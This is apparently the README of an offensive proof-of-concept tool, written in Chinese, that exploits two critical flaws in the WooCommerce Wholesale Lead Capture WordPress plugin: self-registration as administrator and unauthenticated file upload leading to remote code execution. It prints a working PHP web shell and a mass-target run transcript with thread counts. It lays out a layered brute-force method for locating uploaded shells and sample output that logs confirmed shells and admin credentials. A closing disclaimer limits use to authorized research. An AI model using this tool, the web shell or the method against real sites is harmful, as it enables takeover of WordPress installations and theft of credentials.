描述:
用于 WordPress 的 WooCommerce Wholesale Lead Capture 插件在所有已知受影响版本中均存在未认证权限提升漏洞。该漏洞存在于 wwlc_create_user AJAX 操作处理程序中,该程序在处理用户注册请求时,未对用户提供的角色字段进行充分的清理或验证。远程未认证攻击者可以构造特制的 POST 请求,在创建账户时将任意 WordPress 能力字段(包括 wp_capabilities[administrator])直接注入用户元数据。这使得攻击者可以在无需任何预先认证或与合法用户交互的情况下,自行注册为 WordPress 管理员,从而导致受影响的 WordPress 安装被完全攻陷。
描述:
用于 WordPress 的 WooCommerce Wholesale Lead Capture 插件在所有已知受影响版本中均存在未认证任意文件上传漏洞。该漏洞位于 wwlc_file_upload_handler AJAX 操作中,该操作在注册时未要求任何认证或 nonce 验证。通过向 /wp-admin/admin-ajax.php 提交特制的 multipart POST 请求,远程未认证攻击者可以将任意类型的文件(包括 PHP Web Shell)上传到服务器的 wp-content/uploads/ 目录下动态生成的 wwlc-temp-* 子目录中。成功利用该漏洞可在以 Web 进程用户账户运行的底层 Web 服务器上实现远程代码执行(RCE)。
这是一个针对上述两个严重漏洞的概念验证(PoC)利用脚本,目标是运行WooCommerce Wholesale Lead Capture插件的 WordPress 安装。该工具支持两种独立的攻击模式:
| 模式 | 攻击类型 | 目标 |
|---|---|---|
| 模式 1 | 未认证任意文件上传 + 暴力破解目录发现 | 上传 PHP Web Shell,并通过多层目录猜测定位它 |
| 模式 2 | 通过注册进行未认证权限提升 | 自行注册为 WordPress 管理员并验证管理员访问权限 |
pip install requests urllib3 colorama
或通过 requirements 文件安装:
pip install -r requirements.txt
requirements.txt:
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py
python3 CVE-2026-27542_CVE-2026-27540.py
该工具提供交互式终端界面。系统会提示您输入所有必需的参数。
创建一个纯文本文件(例如 list.txt),每行一个目标 URL:
https://target1.com
https://target2.com
http://target3.com/wordpress
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt
Shell 文件示例(shell.php):
<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>
注意:
wwlc-temp-*文件夹由插件使用 PHP 的uniqid('wwlc-temp-')动态生成。该工具使用多层暴力破解策略来发现它:
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:
该工具:
administrator 角色| 文件 | 描述 |
|---|---|
scan_results/wwlc_uploads.txt | 文件上传成功的所有站点(模式 1) |
scan_results/wwlc_shells_found.txt |
[INFO] Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO] https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2
[INFO] Mode1 | Target: https://target.com
[INFO] https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO] https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO] https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s
本工具仅用于教育和授权安全研究目的。
作者Nxploited(Khaled Alenazi)以及本项目的所有贡献者不纵容、不支持,也不承担任何责任,对于在未获得明确书面授权的情况下,使用本工具或使用本软件对系统造成的任何损害,概不负责。
- ✅ 允许: 在您拥有或已获得明确书面许可进行测试的系统上使用。
- ❌ 禁止: 在未经系统所有者事先明确书面授权的情况下,对任何系统使用本工具。
未经授权访问计算机系统是违法的,并将根据适用法律受到处罚,包括但不限于美国《计算机欺诈与滥用法》(CFAA)、《计算机滥用法》(CMA)以及全球范围内的等效法律。
使用本工具即表示您对自己的行为承担全部责任,并确认您拥有测试目标系统的合法授权。
作者对因使用或滥用本软件而导致的任何直接、间接、偶然或后果性损害不承担任何责任。
© 2026 Nxploited (Khaled Alenazi) — 仅用于授权安全研究。
| 字段 | 详情 |
|---|
| CVE ID | CVE-2026-27542 |
| 严重性 | 严重 — CVSS v3.1 评分:9.8 |
| 向量 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 受影响组件 | WooCommerce Wholesale Lead Capture (WWLC) 插件(用于 WordPress) |
| 漏洞类型 | 未认证权限提升 |
| 所需认证 | 无 |
| CWE | CWE-269:权限管理不当 |
| 字段 | 详情 |
|---|
| CVE ID | CVE-2026-27540 |
| 严重性 | 严重 — CVSS v3.1 评分:9.8 |
| 向量 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 受影响组件 | WooCommerce Wholesale Lead Capture (WWLC) 插件(用于 WordPress) |
| 漏洞类型 | 未认证任意文件上传(可导致远程代码执行) |
| 所需认证 | 无 |
| CWE | CWE-434:危险类型文件的上传未受限制 |
| 层 | 策略 | 描述 |
|---|
| 0 | 目录列表 | 尝试列出上传目录(如果开放) |
| 1 | 基于模式 | 基于时间推导和顺序数字猜测 |
| 2 | 基于时间的十六进制 | 以观察到的 HTTP 请求时间戳作为种子 |
| 3 | 随机十六进制 | 纯随机十六进制字符串猜测 |
| 已确认可访问的完整 Shell URL(模式 1) |
scan_results/wwlc_register_results.txt | 所有注册尝试结果及凭据(模式 2) |
scan_results/Admin_login.txt | 已确认的管理员登录命中结果及凭据(模式 2) |